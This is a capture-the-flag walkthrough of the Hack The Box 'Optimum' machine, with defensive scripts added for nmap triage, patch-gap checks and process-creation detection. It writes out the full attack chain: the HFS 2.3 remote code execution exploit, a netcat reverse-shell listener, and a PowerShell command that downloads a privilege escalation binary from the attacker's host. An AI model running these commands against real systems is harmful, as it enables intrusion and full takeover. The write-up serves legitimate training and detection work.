This is a walkthrough of the Optimum box from Hack The Box, done without using Metasploit.
1. Initial Scans
sudo nmap -sC -sV -O -p- -oA initial_scan2 10.10.10.8
- Optimum box IP address is 10.10.10.8
- -sC = run default nmap scripts
- -sV = detect service version
- -O = detect OS
- -p- = Port scan all ports
- -A = Enables OS detection, version detection, script scanning, and traceroute (used on earlier boxes, not in this scan; see the note below)
- -oA = Output in all three formats (.nmap, .gnmap and .xml) under the base name I gave, “initial_scan2”
- Note: In the previous boxes I did -A (enables OS detection, version detection, script scanning and traceroute). However, I found that it still did not pick up as much as doing -sC, -sV and -O individually. So for this scan I changed it up and I got more results.
Port 80 is open and running HttpFileServer httpd 2.3. I also ran a UDP scan to cover all my bases. Using the -sU flag enables you to scan for UDP ports. This took a very long time to complete (in fact, I finished the box before this scan even completed). Everything looks to be filtered on UDP. We don’t get any additional info or possible points of entry from this scan.
sudo nmap -sU -O -p- -oA udp_scan 10.10.10.8
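As an added example (not part of the walkthrough), here is a small triage script for the XML file that -oA writes: it lists every open port with its banner and flags any banner on a watch-list, so a service such as HttpFileServer httpd 2.3 is surfaced for isolation and patching rather than read off a screenshot. The XML below is a constructed stand-in for initial_scan2.xml in nmap's output schema; the watch-list entry is the one version seen on this page.

```python
"""Triage an nmap -oA run from its .xml output: list open ports and flag
banners on a watch-list.  Added example, not part of the walkthrough.
SAMPLE_XML is a constructed stand-in for initial_scan2.xml."""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML schema, mirroring the walkthrough's findings.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sC -sV -O -p- -oA initial_scan2 10.10.10.8">
  <host>
    <address addr="10.10.10.8" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="HttpFileServer httpd" version="2.3" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="135">
        <state state="filtered" reason="no-response"/>
        <service name="msrpc" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Banner patterns a defender wants surfaced immediately (regex -> note).
# Only the HFS entry is drawn from the page; extend as needed.
WATCHLIST = {
    r"^HttpFileServer httpd 2\.3": "HFS 2.3 has a public RCE exploit (EDB 39161): isolate and upgrade",
}


def parse_open_ports(xml_text):
    """Return [(host, port, proto, banner)] for every port in state 'open'."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']") or host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            banner = " ".join(p for p in parts if p)
            results.append((addr, int(port.get("portid")), port.get("protocol"), banner))
    return results


def flag_services(open_ports):
    """Match each banner against WATCHLIST; return [(host, port, note)]."""
    hits = []
    for addr, portid, _proto, banner in open_ports:
        for pattern, note in WATCHLIST.items():
            if re.search(pattern, banner):
                hits.append((addr, portid, note))
    return hits


if __name__ == "__main__":
    # Pass the real initial_scan2.xml as the first argument, otherwise use the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    ports = parse_open_ports(text)
    for addr, portid, proto, banner in ports:
        print(f"{addr}:{portid}/{proto}  {banner or '(no banner)'}")
    for addr, portid, note in flag_services(ports):
        print(f"FLAG {addr}:{portid}  {note}")
```

Only ports in state open are reported, so the UDP scan's filtered results would produce an empty list rather than noise; the watch-list is keyed on the product and version string nmap's -sV probe returns, which is why the banner check only works on a scan that included -sV.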
2. Enumeration
Since we know 10.10.10.8 has an http server on port 80, let’s see what that looks like in a web browser:
It looks like some sort of file keeping/sharing application. Sort of like Dropbox. My first thoughts are: either uploading something to the server, or seeing if there is a default credential available to log in (since there is a login at the top of the page). I feel like a default login would be too easy, so I’ll go ahead and google httpfileserver 2.3 exploits to see what comes up:
The first result that pops up for me looks like some sort of exploit for remote command execution, so I click on it to get some more info:
This exploit is great because it provides a clear description of what the exploit does, and also provides instructions on how to run the script (see “usage” and “edb note” near the bottom of the screenshot above).
Scroll down a bit more and you can see a place for a “local IP address” and a “local port number”. Then at the bottom of the page in green it says “don’t forget to change the local IP and port number”. So we know we will need to adjust that on this script after we download it. I also googled a bit more and found out that the exploit is basically creating a script that will download netcat from our machine to the victim machine and save it to C:\Users\Public\. Then it will run netcat, which will create a reverse shell back to the attacker machine.
So to move forward, we now know we need to do the following:
- set up a web server (on our attacking machine) that hosts netcat over port 80
- edit the script with our own local (attacker) IP and local (attacker) port number
- start a netcat listener on our attacking machine for the reverse shell to connect back to us
- run the exploit using the instructions provided
3. Gaining an initial foothold
Step 1: Set up a web server that hosts netcat over port 80. So let’s find where we have the netcat executable on our box:
Now copy that executable to the location where your web server is going to be set up. I will be running my web server from the optimum directory so I’ll put the executable there:
cp /usr/share/windows-resources/binaries/nc.exe ~/Documents/HTB/optimum
And now to start the file server. Kali has Python’s built-in HTTP server module, which serves the current directory on port 8000 by default (the module below is the Python 2 name; on Python 3 it is http.server). To run it, open up a new terminal window and type:
python -m SimpleHTTPServer
Step 2: Download the exploit and edit the file with our own local IP and port number. Using the EDB-ID from the Exploit page, I can search on my own machine using searchsploit:
searchsploit 39161
I found the exploit on my local exploit database and now to copy it to my current directory, I just add an -m flag:
searchsploit -m 39161
Now just open up the script using your favorite text editor (like VIM) and change the local IP to your attacker IP, and the port to be whatever port you’re going to set up your netcat listener on. I chose port 4444.
Step 3: Start a netcat listener on our machine. I did this in the same directory I downloaded my exploit to (in a new terminal window), and used port 4444:
nc -nlvp 4444
Step 4: Run the exploit:
python 39161.py 10.10.10.8 80
You can see on your file server window that there is a get request coming in for the netcat executable:
Then if you look on your netcat listener window, you can see it received the reverse shell:
Run a whoami to see what user you are currently running as. You can see you’re running as kostas, and you’re currently in that user’s desktop. So run “dir” to see what’s on the Desktop. You can see a user.txt.txt flag so grab it by running “type user.txt.txt”
Kostas is not an admin, so we will need to do some privilege escalation to get the root flag.
4. Privilege Escalation
There is a great script called the “Windows Exploit Suggester” that can help identify possible exploits on a Windows box by checking for missing patches. Definitely bookmark this script as it will come in handy for Windows privilege escalation down the road. To download the script open a new terminal window and type:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
The readme document on the github page mentions that you need to install dependencies as well:
pip install xlrd --upgrade
And that you need to update the database by running the script with its --update flag. This will create an .xls spreadsheet from the Microsoft vulnerability database and save it to your current working directory. You will need this in a few minutes to run the script.
Next on your reverse shell, in your victim machine’s prompt run a “systeminfo” to get all of the info about that box. Copy and paste that entire output into a text file which you can name “sysinfo.txt” and save it in the same directory you saved your windows exploit suggester script and the .xls spreadsheet. Now run the following command to see what exploits come up:
./windows-exploit-suggester.py --database 2020-09-06-mssb.xls --systeminfo sysinfo.txt
- 2020-09-06-mssb.xls is the spreadsheet that was created when you updated the database
- sysinfo.txt is the text file you created that contains the “systeminfo” output from the victim box
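As an added example (not the suggester’s own code), the following script does the defender-side half of what Windows Exploit Suggester does: it parses the Hotfix(s) block of a saved systeminfo output and reports which of a required set of security updates are missing, which is the same check a patch-compliance job would run before an attacker does. SYSINFO is a constructed sample, and the KB numbers in REQUIRED are placeholders; the real bulletin-to-KB mapping comes from the mssb.xls spreadsheet the --update step produces.

```python
"""Patch-gap check in the spirit of Windows Exploit Suggester: parse the
Hotfix(s) block of a `systeminfo` capture and list required updates that are
absent.  Added example, not the suggester's code.  SYSINFO is a constructed
sample; the KB ids in REQUIRED are placeholders, not real KB numbers."""
import re
import sys

SYSINFO = """\
Host Name:                 CONSTRUCTED-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB9900135
                           [03]: KB2919355
Network Card(s):           1 NIC(s) Installed.
                           [01]: Constructed Gigabit Network Connection
"""

# bulletin id -> KB that closes it.  PLACEHOLDER ids: take the real ones from
# the mssb.xls spreadsheet (or vendor advisories) for the target OS build.
REQUIRED = {
    "MS16-098": "KB9900098",
    "MS16-135": "KB9900135",
}

# Hotfix lines are indented and look like "   [01]: KB2959936".
KB_LINE = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)\s*$", re.IGNORECASE)


def parse_systeminfo(text):
    """Return (os_name, os_version, set of installed KB ids, upper-cased)."""
    os_name = os_version = ""
    hotfixes = set()
    in_hotfix_block = False
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            os_version = line.split(":", 1)[1].strip()
        elif line.startswith("Hotfix(s):"):
            in_hotfix_block = True          # the KB lines follow this header
        elif in_hotfix_block:
            m = KB_LINE.match(line)
            if m:
                hotfixes.add(m.group(1).upper())
            else:
                in_hotfix_block = False     # next top-level key ends the block
    return os_name, os_version, hotfixes


def missing_updates(installed, required=REQUIRED):
    """Bulletins whose KB is not in the installed set, sorted by bulletin id."""
    return sorted(b for b, kb in required.items() if kb.upper() not in installed)


if __name__ == "__main__":
    # Pass the saved sysinfo.txt as the first argument, otherwise use the sample.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SYSINFO
    name, version, kbs = parse_systeminfo(text)
    print(f"{name} ({version}): {len(kbs)} hotfixes installed")
    for bulletin in missing_updates(kbs):
        print(f"MISSING {bulletin} -> {REQUIRED[bulletin]}")
```

The block ends at the first non-indented key after Hotfix(s) (Network Card(s) in the sample), so a capture pasted with trailing sections is handled; the comparison is exact KB-id matching, which is what the spreadsheet-based suggester does too, so a superseding cumulative update will show up as a false "missing" unless the required table is maintained with supersedence in mind.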
Anything that has a green E or M next to it is an exploit, and M’s mean Metasploit, so let’s focus on the E’s. MS16-135 talks about DoS so I skip down to MS16-098 and then visit the exploit-db link provided to check it out. It provides a link for the binary (the 41020.exe mentioned at the top of the description) so we can just download it using the link they provided. I downloaded it to the same directory I’m running everything else in:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Do a chmod to make the file executable
chmod +x 41020.exe
Now because this is a privilege escalation executable, we want to get it onto the victim box and be able to run it. You’ll need to set up another web server to “host” the file. Then from the victim box you can reach out to that web server and download it. Just make sure you download it to a directory that you have write access to, like c:\Users\Public\Downloads\
Open a new terminal window and start a new file server (I chose port 9005):
python -m SimpleHTTPServer 9005
Then on your victim box, run this powershell command which allows you to reach out to the file server and download a file to a directory of your choosing. Tip: keep this powershell script in your back pocket for future engagements:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.12:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
- 10.10.14.12 is my IP and 9005 is the port I set up the web server to operate over
If you look on the terminal window running your file server, you should see a get request coming in for that executable!
Now you should see 41020.exe in your Downloads directory on the victim machine. If it’s there, now’s the time to execute it and hopefully escalate privileges to root! Type “41020.exe” to execute. Then run a “whoami” to see if you are now root:
We are now nt authority\system (root) so the exploit worked! Now grab the root flag:
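As an added example from the defender’s side (not part of the walkthrough), here is detection logic for the two behaviours the box turns on: the HFS exploit dropping nc.exe into C:\Users\Public and launching it for the reverse shell (section 2), and the PowerShell WebClient.DownloadFile one-liner pulling 41020.exe into C:\Users\Public\Downloads and executing it (section 4). The events are constructed dicts shaped like Sysmon Event ID 1 (process creation) fields, and hfs.exe as the server’s process name is an assumption; the rules key only on the parent/child relationship, the drop directory, the download cradle and the netcat binary, none of which depend on the exploit’s payload.

```python
"""Process-creation detection for the behaviours used on this box: a web
service spawning a shell, executables launched from C:\\Users\\Public, the
PowerShell WebClient.DownloadFile cradle, and nc.exe itself.  Added example,
not part of the walkthrough.  EVENTS are constructed, Sysmon-Event-ID-1-shaped
dicts; hfs.exe as the HFS process name is an assumption."""
import re
from pathlib import PureWindowsPath

SERVER_PROCESSES = {"hfs.exe"}                    # assumption: HFS binary name
SHELLS = {"cmd.exe", "powershell.exe"}
PUBLIC_DIR = "c:\\users\\public\\"                # world-writable drop dir from the page
DOWNLOAD_CRADLE = re.compile(r"net\.webclient.*downloadfile", re.IGNORECASE | re.DOTALL)

EVENTS = [  # constructed sample telemetry, in the order the walkthrough produces it
    {"UtcTime": "2020-09-06 10:01:05", "ParentImage": "C:\\HFS\\hfs.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c [exploit stage, omitted]", "User": "OPTIMUM\\kostas"},
    {"UtcTime": "2020-09-06 10:01:07", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Users\\Public\\nc.exe",
     "CommandLine": "C:\\Users\\Public\\nc.exe 10.10.14.12 4444", "User": "OPTIMUM\\kostas"},
    {"UtcTime": "2020-09-06 10:20:41", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c \"(new-object System.Net.WebClient).DownloadFile("
                    "'http://10.10.14.12:9005/41020.exe', 'c:\\Users\\Public\\Downloads\\41020.exe')\"",
     "User": "OPTIMUM\\kostas"},
    {"UtcTime": "2020-09-06 10:21:10", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Users\\Public\\Downloads\\41020.exe",
     "CommandLine": "41020.exe", "User": "OPTIMUM\\kostas"},
    {"UtcTime": "2020-09-06 10:30:00", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt", "User": "OPTIMUM\\kostas"},   # benign control
]


def _base(path):
    """Lower-cased file name of a Windows path ('C:\\x\\nc.exe' -> 'nc.exe')."""
    return PureWindowsPath(path).name.lower()


def evaluate(event):
    """Return the names of every rule this process-creation event trips, in rule order."""
    image, parent, cmdline = event["Image"], event["ParentImage"], event["CommandLine"]
    hits = []
    # 1. A file-sharing service has no business launching a shell.
    if _base(parent) in SERVER_PROCESSES and _base(image) in SHELLS:
        hits.append("web_service_spawned_shell")
    # 2. Anything executing out of the world-writable Public tree.
    if image.lower().startswith(PUBLIC_DIR):
        hits.append("exec_from_public_dir")
    # 3. The WebClient.DownloadFile cradle used to fetch the privesc binary.
    if _base(image) == "powershell.exe" and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("powershell_download_cradle")
    # 4. netcat itself, dropped by the HFS exploit.
    if _base(image) == "nc.exe":
        hits.append("netcat_execution")
    return hits


def hunt(events):
    """Return [(time, image, rules)] for events that trip at least one rule."""
    findings = []
    for e in events:
        rules = evaluate(e)
        if rules:
            findings.append((e["UtcTime"], e["Image"], rules))
    return findings


if __name__ == "__main__":
    for when, image, rules in hunt(EVENTS):
        print(f"{when}  {image}  {', '.join(rules)}")
```

Rule 1 is the highest-signal one: the shell spawned by hfs.exe fires before nc.exe is ever downloaded, so it is the point at which blocking would have stopped the foothold. Rules 2 and 4 are also where a mitigation lives, since an application-control or SRP rule that denies execution from C:\Users\Public would have broken both the netcat stage and 41020.exe without any signature knowledge.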